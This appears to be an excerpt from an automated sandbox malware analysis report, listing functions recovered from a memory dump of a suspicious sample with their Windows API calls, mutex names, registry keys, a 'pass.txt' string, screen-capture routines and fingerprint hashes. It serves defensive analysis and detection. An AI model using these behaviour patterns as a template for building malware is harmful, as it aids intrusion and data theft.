                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              • API String ID: 3206501308-1030087416
                                                                                                                                                                                                              • Opcode ID: 80bfa480cc7bb906281c6e72ca9c365d966b14a295dd7e2b5b3ee58eb4057700
                                                                                                                                                                                                              • Instruction ID: 50494bed63bf16547cc0ef6e5d5fa021dc6894b91c34d8e46718c8b2bb725b63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80bfa480cc7bb906281c6e72ca9c365d966b14a295dd7e2b5b3ee58eb4057700
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1101F73056930A6BD2317B55DC0AF5AB69C6B45B14F00411CFB51A22C5ABF4A500977A
                                                                                                                                                                                                              Function 012EF870 Relevance: 20.1, APIs: 16, Instructions: 76memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 82d610fe459e67f6a0f40d1ccbaccd4730d38c84011e056bd7aec628ef9cd312
                                                                                                                                                                                                              • Instruction ID: 6fd95b55954714d542017463fae98329d5224d2440aefa83f1ce9cff239bc67d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d610fe459e67f6a0f40d1ccbaccd4730d38c84011e056bd7aec628ef9cd312
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED112E35A40316B7EB30AABA8C4CF5B7FACEFC5B51F55401ABA0C97280DA30D500CAB0
                                                                                                                                                                                                              Function 012EC950 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(?,774D30D0,7707BCB0,774D3050), ref: 012EC96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 012EC97C
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 012EC9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(?,000000E6), ref: 012EC9C2
                                                                                                                                                                                                              • PrintWindow.USER32(?,?,00000000), ref: 012EC9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000485,?,?), ref: 012EC9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 012ECA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(?,00000000), ref: 012ECA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 012ECA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012ECA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 012ECA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012ECA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012ECA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              • Opcode ID: 3c3130ee372b0492f9f5d92fa8433ba165c977bcbc9292cf357248de82c45083
                                                                                                                                                                                                              • Instruction ID: b1051a0348c1f5c61e0393542f7c0f7676cfa3df5e4b0dda20fae30f93879f93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3130ee372b0492f9f5d92fa8433ba165c977bcbc9292cf357248de82c45083
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6315E71620105AFDB20EEA8DC89FBF7BBCEB45751F50411CFA01A2285D674A9018B64
                                                                                                                                                                                                              Function 0130E214 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 0130E265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0130E281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 0130E29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0130E2B1
                                                                                                                                                                                                              • wsprintfA.USER32(?,%02d/%02d/%04d %02d:%02d,?,?,?,?,?), ref: 0130E2DC
                                                                                                                                                                                                              • realloc.MSVCRT(00000000,?), ref: 0130E302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0130E375
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 0130E40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 0130E2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              • Opcode ID: d8417089fb34234b048ffdc204e7afe82733ad224ec264afe24990db98589509
                                                                                                                                                                                                              • Instruction ID: 7cb7f031f97a0364459070e10f50dc868f4a1e03a93495647e9db38d6b2f0880
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8417089fb34234b048ffdc204e7afe82733ad224ec264afe24990db98589509
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F612A71A007099FDB21DF78DC54AEE7BF8EF49315F0046A9F94697281DB31A505CBA0
                                                                                                                                                                                                              Function 01303DD0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E10
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E4D
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303E62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303E6C
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303E74
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303E85
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303E8C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303F50,00000000,00000000,00000000,00000000,00000001), ref: 01303EF5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303F0D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01303F1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateErrorHandleLast$#680CloseDirectoryFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: pass.txt
                                                                                                                                                                                                              • API String ID: 1025529708-1961669250
                                                                                                                                                                                                              • Opcode ID: 138cb72a18c0fea1a8cacf712bac705fe99f87630432d759cc07d0a507194e7a
                                                                                                                                                                                                              • Instruction ID: 75976b48b6bdf0b8009486ffabd810f012feb945e695a1d4be690e0b95bda2f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 138cb72a18c0fea1a8cacf712bac705fe99f87630432d759cc07d0a507194e7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341163160420A9FDB329F68D868BEA7BE8FF45304F044158FDC6D3281CB709A48CBA4
                                                                                                                                                                                                              Function 01303DE7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E10
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E4D
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303E62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303E6C
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303E74
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303E85
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303E8C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303F50,00000000,00000000,00000000,00000000,00000001), ref: 01303EF5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303F0D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01303F1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateErrorHandleLast$#680CloseDirectoryFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: pass.txt
                                                                                                                                                                                                              • API String ID: 1025529708-1961669250
                                                                                                                                                                                                              • Opcode ID: fd8e5d1f000a9b03093dd8410317a562f6ac2ea45a45208be7bee5c7c373ef77
                                                                                                                                                                                                              • Instruction ID: e580bc19e7ed201fe1f6b079f9b1db4f0d0bfbd63fb69f12311369685f4c1b52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd8e5d1f000a9b03093dd8410317a562f6ac2ea45a45208be7bee5c7c373ef77
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541E7355042459FDB329F68D868BEA7BE9FF45304F144148FD8AD7281CB709A44CBA4
                                                                                                                                                                                                              Function 012E6C70 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2470003939
                                                                                                                                                                                                              • Opcode ID: 1b0d7164c13d2a89f8ee425b606a69028c7db9fe6bbaffa3cc8880b8a7705a5d
                                                                                                                                                                                                              • Instruction ID: 6af40be4a260fd1639950f360e4fd54c499f60aebddc494c1289f0c4ed0121e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b0d7164c13d2a89f8ee425b606a69028c7db9fe6bbaffa3cc8880b8a7705a5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1131F870E5122E66DB25EB68CC0DBEE7BACAF24704F80459CF649E2185D7B1468487E1
                                                                                                                                                                                                              Function 012E6B10 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6B41
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6B5F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 012E6B7A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(80000001,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6C21
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 012E6C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2470003939
                                                                                                                                                                                                              • Opcode ID: e9b59f8d72bcc438522460272f57f2e3bc08806b6feecbc674c3acbf60035a40
                                                                                                                                                                                                              • Instruction ID: 14059193c6462e087941a32a5f57c3964f048f02fab5509a83117236a06509e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b59f8d72bcc438522460272f57f2e3bc08806b6feecbc674c3acbf60035a40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7331C870D512596AEB25EB64CC4DFEE7BB8EF24704F40859CE609E6181E7B487848BA0
                                                                                                                                                                                                              Function 012EB820 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EB870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EB889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EB898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 012EB8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EB8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 012EB8FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2596333622-1167384825
                                                                                                                                                                                                              • Opcode ID: a5ea1bf3aa4d546da5a583458b643cd1c6a93cd0d87fe808a403113814d45e4b
                                                                                                                                                                                                              • Instruction ID: 14d81f77035f4c58ba116af7dffc36d6c6cce1088b4cde6c27d433b63b5630f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5ea1bf3aa4d546da5a583458b643cd1c6a93cd0d87fe808a403113814d45e4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21A172205214AFC730AF69E84DEEABBECEB59732F44817AF605D7295C7704541CBA0
                                                                                                                                                                                                              Function 013043F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 0130440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01304422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 01304430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01304439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01304451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01304463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 0130446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,0133D19C,VEFK), ref: 01304488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-4074141098
                                                                                                                                                                                                              • Opcode ID: 4074ef1ffb3d223af0f494f25896cfc01cb1d36065188ef1923752e51d283915
                                                                                                                                                                                                              • Instruction ID: a585fbb362cb1a713859d0d2c9883af45bdcb379d957743fd3b080753ed21146
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4074ef1ffb3d223af0f494f25896cfc01cb1d36065188ef1923752e51d283915
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A401D6366817152BD2327A6A9C06F9EB7CC9F46B18F014118FF44A62C1DBF0A60046AA
                                                                                                                                                                                                              Function 012FB8F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c09f,ALPHA), ref: 012FB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61c5c09f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4280258085-2790425520
                                                                                                                                                                                                              • Opcode ID: 3487607d7c6b1248b457ec7e9c2d8da7113cd82b44d53b549097a3f1e0cd9f12
                                                                                                                                                                                                              • Instruction ID: 8e990412519619733501fc21315de92393ffc5d2fe598122b54a3718137d84d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3487607d7c6b1248b457ec7e9c2d8da7113cd82b44d53b549097a3f1e0cd9f12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF0F9305A93167AE6317B658C0AF5AB69CAB05B14F00401CF701A13C5C7E0A6049BB6
                                                                                                                                                                                                              Function 013032B0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 013032DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013032E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013032F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01303336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
